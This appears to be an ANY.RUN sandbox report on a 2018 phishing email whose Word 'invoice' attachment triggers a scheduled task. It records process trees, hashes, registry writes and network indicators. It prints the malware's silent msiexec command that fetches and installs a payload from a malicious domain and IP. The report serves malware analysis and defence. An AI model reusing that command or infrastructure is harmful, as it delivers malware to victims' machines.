analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

7f43_9953_95570ebc_b0b0_4312_8d7f_05aa6e4e3721.eml (72.4 KB).msg

Full analysis: https://app.any.run/tasks/0f378e5e-643b-44d1-91a2-9425bf38da00
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: November 08, 2018, 18:09:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
Indicators:
MIME: application/vnd.ms-outlook
File info: CDFV2 Microsoft Outlook Message
MD5:

1DFA5F9C5D3B90DFC0B64ACE0263696D

SHA1:

748EBA5B54B8456530D78DAD73D68DAE62FA4E85

SHA256:

4F536333DAE6B8DF59CEEC637EFDB35F37CF7C11B362CD2949325FD6E6BF0F1D

SSDEEP:

1536:Mze1TUAeAyJB52y6IdOLY8S5GxvSt3y83D2hY2Mgmx32p:B1TIf2vIdUKt3R4Y2Dmxg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Loads the Task Scheduler COM API

      • WINWORD.EXE (PID: 920)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • OUTLOOK.EXE (PID: 3032)
    • Application launched itself

      • WINWORD.EXE (PID: 920)
    • Starts Microsoft Office Application

      • OUTLOOK.EXE (PID: 3032)
      • WINWORD.EXE (PID: 920)
    • Creates files in the user directory

      • OUTLOOK.EXE (PID: 3032)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 920)
      • OUTLOOK.EXE (PID: 3032)
      • WINWORD.EXE (PID: 800)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 920)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msg | Outlook Message (46.5)
.oft | Outlook Form Template (27.2)
.doc | Microsoft Word document (20.9)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
5
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start outlook.exe winword.exe no specs winword.exe no specs msiexec.exe no specs msiexec.exe

Process information

PID
CMD
Path
Indicators
Parent process
3032"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\7f43_9953_95570ebc_b0b0_4312_8d7f_05aa6e4e3721.eml (72.4 KB).msg"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Outlook
Version:
14.0.6025.1000
920"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\1TEXVN7K\invoice-07 11 2018.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEOUTLOOK.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
800"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
3192C:\Windows\System32\msiexec.exe VI=ssa EXE=DLL /q /norestart /i http://officesupportbox.com/WMIsvcC:\Windows\System32\msiexec.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
1619
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3552C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Total events
3 346
Read events
2 533
Write events
786
Delete events
27

Modification events

(PID) Process:(3032) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3032) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3032) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Resiliency\StartupItems
Operation:writeName:$:i
Value:
243A6900D80B0000010000000000000000000000
(PID) Process:(3032) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook
Operation:writeName:MTTT
Value:
D80B0000DE99434F8E77D40100000000
(PID) Process:(3032) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM
Operation:writeName:SQMSessionNumber
Value:
0
(PID) Process:(3032) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\SQM
Operation:writeName:SQMSessionDate
Value:
219768480
(PID) Process:(3032) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\0a0d020000000000c000000000000046
Operation:writeName:00030429
Value:
03000000
(PID) Process:(3032) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676
Operation:writeName:{ED475418-B0D6-11D2-8C3B-00104B2A6676}
Value:
(PID) Process:(3032) OUTLOOK.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\NoMail\9375CFF0413111d3B88A00104B2A6676
Operation:writeName:LastChangeVer
Value:
1200000000000000
(PID) Process:(3032) OUTLOOK.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109A10090400000000000F01FEC\Usage
Operation:writeName:OutlookMAPI2Intl_1033
Value:
1298661397
Executable files
0
Suspicious files
4
Text files
24
Unknown types
3

Dropped files

PID
Process
Filename
Type
3032OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\CVRA294.tmp.cvr
MD5:
SHA256:
3032OUTLOOK.EXEC:\Users\admin\AppData\Local\Temp\~DF690B93860087E94B.TMP
MD5:
SHA256:
3032OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\1TEXVN7K\invoice-07 11 2018 (2).doc\:Zone.Identifier:$DATA
MD5:
SHA256:
920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBEC7.tmp.cvr
MD5:
SHA256:
920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_CA7EA8D7-EB0D-45F0-9005-006110D6BF54.0\B4D02A61.doc\:Zone.Identifier:$DATA
MD5:
SHA256:
800WINWORD.EXEC:\Users\admin\AppData\Local\Temp\OICE_CA7EA8D7-EB0D-45F0-9005-006110D6BF54.0\~DFD8D3D3A589ED0666.TMP
MD5:
SHA256:
3552msiexec.exeC:\Windows\Installer\MSIFB3F.tmp
MD5:
SHA256:
3032OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmpgc
MD5:1E92D18650E1D01429B10B124BAAB176
SHA256:5FB157A3B46C18CB22854253E8A28EBCB16D78C9D8E7B439921E05D9A43041C4
3032OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\1TEXVN7K\invoice-07 11 2018.docdocument
MD5:D5196A49F3C6B7C354CB8C76BBB60ED5
SHA256:2003B152F09BBBF38702B7265A92E1470F8F1BFE5278B0F171B604F276A05958
3032OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_ADED8760A7AA1E43A8AD7054FE99DFD6.datxml
MD5:EEAA832C12F20DE6AAAA9C7B77626E72
SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3552
msiexec.exe
GET
185.244.130.88:80
http://officesupportbox.com/WMIsvc
unknown
malicious
3032
OUTLOOK.EXE
GET
64.4.26.155:80
http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig
US
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3032
OUTLOOK.EXE
64.4.26.155:80
config.messenger.msn.com
Microsoft Corporation
US
whitelisted
3552
msiexec.exe
185.244.130.88:80
officesupportbox.com
malicious

DNS requests

Domain
IP
Reputation
config.messenger.msn.com
  • 64.4.26.155
whitelisted
officesupportbox.com
  • 185.244.130.88
malicious

Threats

PID
Process
Class
Message
3552
msiexec.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Malicious behavior by evader Trojan.Script.Generic
3552
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
No debug info